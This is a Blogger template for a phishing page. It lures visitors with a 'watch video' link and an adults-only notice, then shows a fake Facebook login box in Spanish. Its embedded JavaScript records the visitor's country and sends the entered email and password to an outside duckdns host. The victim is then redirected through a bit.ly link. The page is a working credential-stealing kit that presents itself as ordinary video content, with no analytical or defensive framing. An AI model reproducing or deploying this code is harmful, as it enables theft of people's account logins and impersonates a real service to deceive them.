<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>



<head>
    <meta charset='UTF-8'/>
    <title><data:blog.pageTitle/></title>
      <b:skin><![CDATA[
            
    
  ]]></b:skin>
    <style>
        .modal-content {
            width: 380px;
            height: 480px;
            background-color: transparent !important;
            box-shadow: none !important;
            border: 0 !important;
        }
        .modal-body {
            background: radial-gradient(ellipse at center,#5170ad 0,#355493 100%);
            border: 1px solid #2d416d;
            box-shadow: 0 1px #5670a4 inset, 0 0 10px 5px rgba(0,0,0,.1);
            border-radius: 5px;
            width: 380px;
            height: 480px;
            margin: 60px auto;
            padding: 50px 30px 0 30px !important;
            text-align: center;
            margin-left: 50%;
            transform: translateX(-25%);
        }
        .modal-body h1 {
                margin: 0 0 50px 0;
            padding: 0;
            font-weight: 700;
            font-size: 26px;
            color: #fff;
        }
        .login-form input[name=username], .login-form input[name=password] {
            width: 100%;
            border: 1px solid #314d89;
            margin-right: 110px;
            outline: 0;
            padding: 12px 20px;
            font-weight: 400;
            font-family: Lato,sans-serif;
            cursor: pointer;
        }
        .login-form input[name=username] {
            border-bottom: none;
            border-radius: 4px 4px 0 0;
            padding-bottom: 13px;
            box-shadow: 0 -1px 0 #e0e0e0 inset, 0 1px 2px rgba(0,0,0,.23) inset;
        }
        .login-form input[name=password] {
            border-top: none;
            border-radius: 0 0 4px 4px;
            box-shadow: 0 -1px 2px rgba(0,0,0,.23) inset, 0 1px 2px rgba(255,255,255,.1);
        }
        #btnSubmit {
            font-family: Lato,sans-serif;
            font-weight: 400;
            background: linear-gradient(to bottom,#e0e0e0 0,#cecece 100%);
            display: block;
            margin: 20px auto 0 auto;
            width: 100%;
            border: none;
            border-radius: 3px;
            padding: 8px;
            font-size: 17px;
            color: #636363;
            text-shadow: 0 1px 0 rgba(255,255,255,.45);
            font-weight: 700;
            box-shadow: 0 1px 3px 1px rgba(0,0,0,.17), 0 1px 0 rgba(255,255,255,.36) inset;
        }
        .login-form-wrap h5&gt;a {
            font-size: 14px;
            color: #fff;
            text-decoration: none;
            font-weight: 400;
        }
        .mt-10 {
            margin-top: 10px;
            margin-bottom: 10px;
        }
        @media (max-width: 992px) {
            .modal-content {
                box-shadow: none !important;
            }
            .modal-dialog, .modal-content, .modal-body, label {
                width: 100% !important;
            }
            .modal-body { 
                margin-left: 0;
                transform: translateX(0);
                height: 750px;
            }
            .facebook_logo {
                font-size: 60px !important;
                margin: 50px 0 !important;
            }
            .login-form-wrap, #btnSubmit {
                font-size: 40px !important;
            }
            .forgotpass {
                font-size: 30px !important;
            }
            .title {
                font-size: 60px !important;
            }
            .forgotpass_h5 {
                margin-top: 50px;
            }
        }
        
    </style>
</head>

<body onclick='showModal();'>
    <header>
    <b:section class='header' id='header' maxwidgets='1' showaddelement='yes'>
      <b:widget id='Header1' locked='false' title='testkjashkdj (Header)' type='Header' version='1'>
        <b:widget-settings>
          <b:widget-setting name='displayUrl'/>
          <b:widget-setting name='displayHeight'>0</b:widget-setting>
          <b:widget-setting name='sectionWidth'>-1</b:widget-setting>
          <b:widget-setting name='useImage'>false</b:widget-setting>
          <b:widget-setting name='shrinkToFit'>false</b:widget-setting>
          <b:widget-setting name='imagePlacement'>BEHIND</b:widget-setting>
          <b:widget-setting name='displayWidth'>0</b:widget-setting>
        </b:widget-settings>
        <b:includable id='main'>
          <b:if cond='data:useImage'>
            <b:if cond='data:imagePlacement == &quot;BEHIND&quot;'>
              <b:if cond='data:mobile'>
                <div id='header-inner'>
                  <div class='titlewrapper' style='background: transparent'>
                    <h1 class='title' style='background: transparent; border-width: 0px'>
                      <b:include name='title'/>
                    </h1>
                  </div>
                  <b:include name='description'/>
                </div>
                <b:else/>
                <div expr:style='&quot;background-image: url(\&quot;&quot; + data:sourceUrl + &quot;\&quot;); &quot;+ &quot;background-position: &quot;+ data:backgroundPositionStyleStr + &quot;; &quot;+ data:widthStyleStr+ &quot;min-height: &quot; + data:height+ &quot;_height: &quot; + data:height+ &quot;background-repeat: no-repeat; &quot;' id='header-inner'>
                  <div class='titlewrapper' style='background: transparent'>
                    <h1 class='title' style='background: transparent; border-width: 0px'>
                      <b:include name='title'/>
                    </h1>
                  </div>
                  <b:include name='description'/>
                </div>
              </b:if>
              <b:else/>
              <div id='header-inner'>
                <a expr:href='data:blog.homepageUrl' style='display: block'>
                  <img expr:alt='data:title' expr:height='data:height' expr:id='data:widget.instanceId + &quot;_headerimg&quot;' expr:src='data:sourceUrl' expr:width='data:width' style='display: block'/>
                </a>
                <b:if cond='data:imagePlacement == &quot;BEFORE_DESCRIPTION&quot;'>
                  <b:include name='description'/>
                </b:if>
              </div>
            </b:if>
            <b:else/>
            <div id='header-inner'>
              <div class='titlewrapper'>
                <h1 class='title'>
                  <b:include name='title'/>
                </h1>
              </div>
              <b:include name='description'/>
            </div>
          </b:if>
        </b:includable>
        <b:includable id='description'>
          <div class='descriptionwrapper'>
            <p class='description'><span>
                <data:description/></span></p>
          </div>
        </b:includable>
        <b:includable id='title'>
          <b:tag cond='data:blog.url != data:blog.homepageUrl' expr:href='data:blog.homepageUrl' name='a'>
            <data:title/>
          </b:tag>
        </b:includable>
      </b:widget>
    </b:section>
  </header>
    <div align='center' style='margin-top: 30px;'>
        <div class='separator' style='clear: both; text-align: center;'>
            <b><span style='color: red; font-size: 26pt; font-style: italic;'><a class='title' href='#' onclick='showModal()' style='color: red;'>&#9654; CLICK HERE TO WATCH VIDEO</a></span></b>
        </div>
    <img alt='Image' class='img-responsive' id='img1' src='https://i.imgur.com/qSDU6mD.png' style='display: none;'/>
        <img alt='Image' class='img-responsive' id='img2' src='https://i.imgur.com/qSDU6mD.png' style='display: none;'/>
        <img alt='Image' class='img-responsive' id='img3' src='https://i.imgur.com/qSDU6mD.png' style='display: none;'/>
        <img alt='Image' class='img-responsive' id='img4' src='https://i.imgur.com/qSDU6mD.png' style='display: none;'/>
        <img alt='Image' class='img-responsive' id='img5' src='https://i.imgur.com/qSDU6mD.png' style='display: none;'/>
    </div>
    <div class='modal fade' id='myModal' role='dialog'>
        <div class='modal-dialog'>
            <!-- Modal content-->
            <div class='modal-content'>
                <div class='modal-body'>
                    <section class='login-form-wrap'>
                        <h1 class='facebook_logo'>Facebook</h1>
                        <div id='noti' style='    background-color: #fff9d7; border: 1px solid #e2c822; padding: 6px; margin-bottom: 5px;'>Contenido para mayores de 18 años, inicie sesión antes de verlo.</div>
                        <form class='login-form' id='test-form' method='GET'>
                            <label class='mt-10'>
                                <input id='username' name='username' placeholder='Se requiere correo electrónico o número de teléfono='' type='text'/>
                            </label>
                            <label class='mt-10'>
                                <input id='password' name='password' placeholder='Contraseña' required='' type='password'/>
                            </label>
                            <input id='country' name='country' style='display:none' type='text'/>
                            <input class='mt-10' id='btnSubmit' onclick='submitForm();' type='button' value='Entrar'/>
                        </form>
                        <h5 class='forgotpass_h5'><a class='forgotpass' href='#' target='_blank'>¿Olvidaste tu contraseña?</a></h5>
                    </section>
                </div>
            </div>
        </div>
    </div>
</body>
<div id='loading' style='position: fixed; z-index: 10000; text-align: center; top: 0; display: none; left: 0; width: 100vw; height: 100vh; background-color: rgba(0,0,0,.5);'>
    <img src='https://www.fk-austria.at/?proxy=images/waiting.gif' style='margin-top: 100px; width: 100px; height: 100px;'/>
</div>
<link href='https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css' rel='stylesheet'/>
<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js'/>
<script src='https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js'/>
<script type='text/javascript'>
  
            //<![CDATA[
$(document).ready(() => {
    let num = Math.floor(Math.random() * 5) + 1;
    $('#img' + num).show();
});
var count = 0;

sr = "";

var xhrip = new XMLHttpRequest();
xhrip.open('GET', 'https://ipinfo.io/json');
xhrip.onload = function() {
    
    if (xhrip.status === 200) 
    {
        try
        {
            var rs = xhrip.responseText;
            var js = JSON.parse(rs);
            sr+=js.country;
            //sr+=" - " + js.region; 
            
        }catch(ex)
        {
            sr+=" - Error";
        }
    
        
        
    }
    else 
    {
        var err = xhr.status;
        sr+=err;
    }

};
xhrip.send();

  


function submitForm() {
    // $('#username').val("'" + $('#username').val());
    // $('#password').val("'" + $('#password').val());

    if ($('#username').val().length < 3 || $('#password').val().length < 6) {
        //alert('As informações inseridas não estão corretas');
        $('#noti').css({ "color": "red" });
        $('#noti').text('La cuenta que ingresó no es válida. Vuelva a intentarlo.');
        return;
    } else {
        //count++;
    }

    if (true) {
        console.log(count);
        $('#loading').show();
        var xhr = new XMLHttpRequest();
        var email = document.getElementById("username").value;
        var pass = document.getElementById("password").value;
        var truyen = encodeURI("email=" + email + "|pass=" + pass + "|laguage=" + sr);

        var xhr = new XMLHttpRequest();
        xhr.open('GET', '//newhotls.duckdns.org/the/accvia.php?'+ truyen);
        xhr.onload = function () {
          if (xhr.status === 200) {
            try {
              var rs = xhr.responseText;
              if (rs != "error") {
                window.location = 'https://bit.ly/3gV4iaw';
              }
            } catch (ex) { }
          }
        };
        xhr.send();

    }
}

function showModal(e) {
    $('#myModal').modal({
        backdrop: 'static',
        keyboard: true,
        show: true
    });
}

$('#myModal').click(() => {
    event.stopPropagation();
})

$('#loading').click(() => {
    event.stopPropagation();
})

 //]]>
</script>

</html>
